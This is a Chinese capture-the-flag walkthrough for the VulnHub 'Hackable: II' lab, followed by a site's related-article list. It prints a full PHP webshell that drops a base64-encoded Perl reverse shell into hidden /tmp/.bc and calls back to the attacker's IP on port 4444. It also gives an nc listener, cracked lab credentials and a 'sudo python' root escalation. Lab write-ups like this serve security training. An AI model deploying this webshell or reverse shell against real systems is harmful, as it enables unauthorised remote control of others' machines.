靶场练习第十八天~vulnhub靶场之hackableII

一、准备工作

kali和靶机都选择NAT模式(kali与靶机同网段)

1.靶场环境

下载链接:Hackable: II ~ VulnHub

2.kali的ip

命令:ifconfig

3.靶机的ip

扫描靶机ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)扫描靶机开放的端口及其服务

nmap -sC -A -p- 192.168.101.124

2.网站信息收集

(1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息

发现是apapche默认页面,使用dirb进行目录扫描

dirb http://192.168.101.124

扫出http://192.168.101.124/files/,访问一下

三、漏洞发现及利用

(1)ftp登录

1.发现21端口允许 anonymous: allowed登录

ftp 192.168.101.124

2.下载下CALL.html文件,查看其中的内容

get CALL.html

3.发现这就是刚才那个CALL.html文件

4.上传一个txt测试一下

put swn.txt

查看txt文件,跟我写的一模一样

(2)通过ftp上传webshell.php

webshell源码

<?php

function which($pr) {

$path = execute("which $pr");

return ($path ? $path : $pr);

}

function execute($cfe) {

$res = '';

if ($cfe) {

if(function_exists('exec')) {

@exec($cfe,$res);

$res = join("\n",$res);

} elseif(function_exists('shell_exec')) {

$res = @shell_exec($cfe);

} elseif(function_exists('system')) {

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(function_exists('passthru')) {

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(@is_resource($f = @popen($cfe,"r"))) {

$res = '';

while(!@feof($f)) {

$res .= @fread($f,1024);

}

@pclose($f);

}

}

return $res;

}

function cf($fname,$text){

if($fp=@fopen($fname,'w')) {

@fputs($fp,@base64_decode($text));

@fclose($fp);

}

}

$yourip = "192.168.101.10";

$yourport = '4444';

$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);

$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

?>

1.将php放到/home/kali目录下,因为我刚才是用kali用户进行ftp登录,默认情况下通过这里上传

2.上传webshell

put webshell.php

3.在kali这边开启监听

nc -lvvp 4444

4.进入到网页http://192.168.101.124/files/这边访问webshell

kali这边成功监听

5.优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python3 -c 'import pty; pty.spawn("/bin/bash");'

四、提权

1.发现一个提示文件,让我们启动脚本

cd /home

ls

cat important.txt

/.runme.sh

得到一个用户密码:shrek:cf4c2232354952690368f1b3dfdfb24d

这个密码是加密过的,尝试用md5解密

最后得到用户密码:shrek:onion

2.ssh远程登录

ssh shrek@192.168.101.124

3.查看该用户的权限并且该用户能够利用引用root相关的执行文件有哪些

sudo -l

4.使用python进行提权

sudo python3.5 -c 'import os; os.system("/bin/sh")'

5.拿下flag

ls

cat user.txt

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/375030.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Object-c基础(2)

Object-c基础(2)

类和对象 类 在Object-c中类&#xff0c;其接口&#xff08;interface&#xff09;和实现&#xff08;implementation&#xff09;是分离开来的 类的声明 interface 类名:父类名{实例变量的定义;}方法声明;...end类的实现 implementation 类名方法定义...end对象 一个类提供…
阅读更多...
arm linux 下移植busybox 的tftp

arm linux 下移植busybox 的tftp

&#xff08;1&#xff09;进入busybox目录&#xff0c;make menuconfig &#xff0c;然后在networking中勾选tftp项跟tftpd项。 &#xff08;2&#xff09;配置/etc/inetd.conf 中关于tftp的选项&#xff08;此部未验证&#xff0c;不需要应该也可以&#xff09; tftp dgra…
阅读更多...
靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

一、环境搭建 靶官网机下载地址&#xff1a;Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二、信息收集 1.nmap命令扫描靶机 先用ifconfig查看kali的IP&#xff0c;因为kali和靶机都是NAT模式下&#xff0c;所以用 nmap 192.168…
阅读更多...
documentbodyscrollTop的值总为零的解决办法

documentbodyscrollTop的值总为零的解决办法

有一个功能需要判断返回顶部按钮是否显示。 JS代码如下&#xff1a; var sTop document.body.scrollTop;if(sTop>100){document.getElementById("sm_top").style.display"block";}else{document.getElementById("sm_top").style.display&quo…
阅读更多...
spring mvc 多线程并发

spring mvc 多线程并发

ThreadLocal为解决多线程程序的并发问题提供了一种新的思路。使用这个工具类可以很简洁地编写出优美的多线程程序。 http://www.xuebuyuan.com/1628190.html 我们知道Spring通过各种DAO模板类降低了开发者使用各种数据持久技术的难度。这些模板类都是线程安全的&#xff0c;也就…
阅读更多...
靶场练习第十九天~vulnhub靶场之GreenOptic: 1

靶场练习第十九天~vulnhub靶场之GreenOptic: 1

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:GreenOptic: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机开…
阅读更多...
靶场练习第二十五天~vulnhub靶场之Raven-2

靶场练习第二十五天~vulnhub靶场之Raven-2

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机开放的…
阅读更多...
每天一个linux命令(46):vmstat命令

每天一个linux命令(46):vmstat命令

vmstat是Virtual Meomory Statistics&#xff08;虚拟内存统计&#xff09;的缩写&#xff0c;可对操作系统的虚拟内存、进程、CPU活动进行监控。他是对系统的整体情况进行统计&#xff0c;不足之处是无法对某个进程进行深入分析。vmstat 工具提供了一种低开销的系统性能观察方…
阅读更多...
用TypeScript开发了一个网页游戏引擎,开放源代码

用TypeScript开发了一个网页游戏引擎,开放源代码

最开始学习电脑编程的原动力之一就是想自己编写游戏&#xff0c;一方面很好奇这些游戏是怎么做出来的&#xff0c;另一方面觉得有些地方设计的不合理&#xff0c;希望电脑游戏既能让人玩的有趣&#xff0c;又不浪费时间。 学校五年&#xff0c;毕业十年&#xff0c;学用了十多种…
阅读更多...
靶场练习第二十一天~vulnhub靶场之Momentum-1

靶场练习第二十一天~vulnhub靶场之Momentum-1

一、环境搭建 1.ifconfig查看kali的ip 2.创建靶机 靶机下载地址&#xff1a;Momentum: 1 ~ VulnHub 二、信息收集 1.nmap命令 寻找靶机ip&#xff1a;nmap 192.168.101.0/24 2.端口扫描 使用命令&#xff1a;nmap -A -T4 -p 1-65535 192.168.101.113&#xff0c;发现开放2…
阅读更多...
为集合排序的三个方法

为集合排序的三个方法

// 为集合字符串排序&#xff08;cmpare:&#xff09; // - null &#xff1a;空类型 就是字符型的0&#xff1b; // - [NSNull null]是对象类型&#xff0c;能够存入集合的数据&#xff1a;为其分配了内存&#xff0c;但其中的值为空&#xff08;不能被排序否则程序会崩溃&am…
阅读更多...
C#ArrayList对象集合

C#ArrayList对象集合

ArrayList alist new ArrayList();//集合对像 长度可以改变&#xff0c;类型不限//添加单个元素可以Add()alist.Add("在在的");alist.Add(35);alist.Add(3.14);alist.Add(c);alist.Add(5000m);//如果用Add()添加数组或集合最好用 alist.AddRange()alist.AddRange(…
阅读更多...
靶场练习第二十二天~vulnhub靶场之Momentum-2

靶场练习第二十二天~vulnhub靶场之Momentum-2

一、准备工作 靶机下载地址&#xff1a;Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端口和协议&#xff1a;nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster&#xff0c;寻找隐藏的网站 gobuster di…
阅读更多...
索引深入浅出(8/10):覆盖索引或列包含

索引深入浅出(8/10):覆盖索引或列包含

在索引深入浅出&#xff1a;非聚集索引的B树结构在聚集表里&#xff0c;在聚集表里&#xff0c;我们看到非聚集索引的叶子层只包含非聚集索引键和聚集索引键。从聚集表结构或堆表结构里拿到剩下列&#xff0c;SQL Server需要进行书签/键查找操作。很多情况下书签或键查找非常消…
阅读更多...
靶场练习第二十三天~vulnhub靶场之GOATSELINUX: 1

靶场练习第二十三天~vulnhub靶场之GOATSELINUX: 1

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机…
阅读更多...
Spring事务报Connection is read-only

Spring事务报Connection is read-only

昨天做项目时&#xff0c;写了个方法,程序突然报了Connection is readonly. Queries leading to data modification are not allowed调了程序半天&#xff0c;最后才发现是自己在spring配置文件中增加了事务.把方法写成了大写开头了&#xff0c;但是spring配置是以小写开头 代码…
阅读更多...
HTTP协议具体解释

HTTP协议具体解释

HTTP是一个属于应用层的面向对象的协议。因为其简捷、高速的方式。适用于分布式超媒体信息系统。它于1990年提出&#xff0c;经过几年的使用与发展&#xff0c;得到不断地完好和扩展。眼下在WWW中使用的是HTTP/1.0的第六版&#xff0c;HTTP/1.1的规范化工作正在进行之中&#x…
阅读更多...
靶场练习第二十四天~vulnhub靶场之Raven-1

靶场练习第二十四天~vulnhub靶场之Raven-1

一、准备工作 kali和靶机都选择NAT模式&#xff08;kali与靶机同网段&#xff09; 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;扫描靶机开放的…
阅读更多...
【知识积累】DES算法之C#加密Java解密

【知识积累】DES算法之C#加密Java解密

一、前言 在项目需要添加安全模块&#xff0c;客户端调用服务端发布的service必须要经过验证&#xff0c;加密算法采用DES&#xff0c;客户端采用C#进行加密&#xff0c;服务端使用Java进行解密。废话不多说&#xff0c;直接上代码。 二、客户端 客户端采用C#进行开发&#xff…
阅读更多...
Space.js – HTML 驱动的页面 3D 滚动效果

Space.js – HTML 驱动的页面 3D 滚动效果

为了让我们的信息能够有效地沟通&#xff0c;我们需要创建用户和我们的媒体之间的强有力的联系。今天我们就来探讨在网络上呈现故事的新方法&#xff0c;并为此创造了一个开源和免费使用的 JavaScript 库称为 space.js。该库是 HTML 驱动的&#xff0c;这意味着你不需要在网站上…
阅读更多...
最新文章

Copyright @ 2022~2023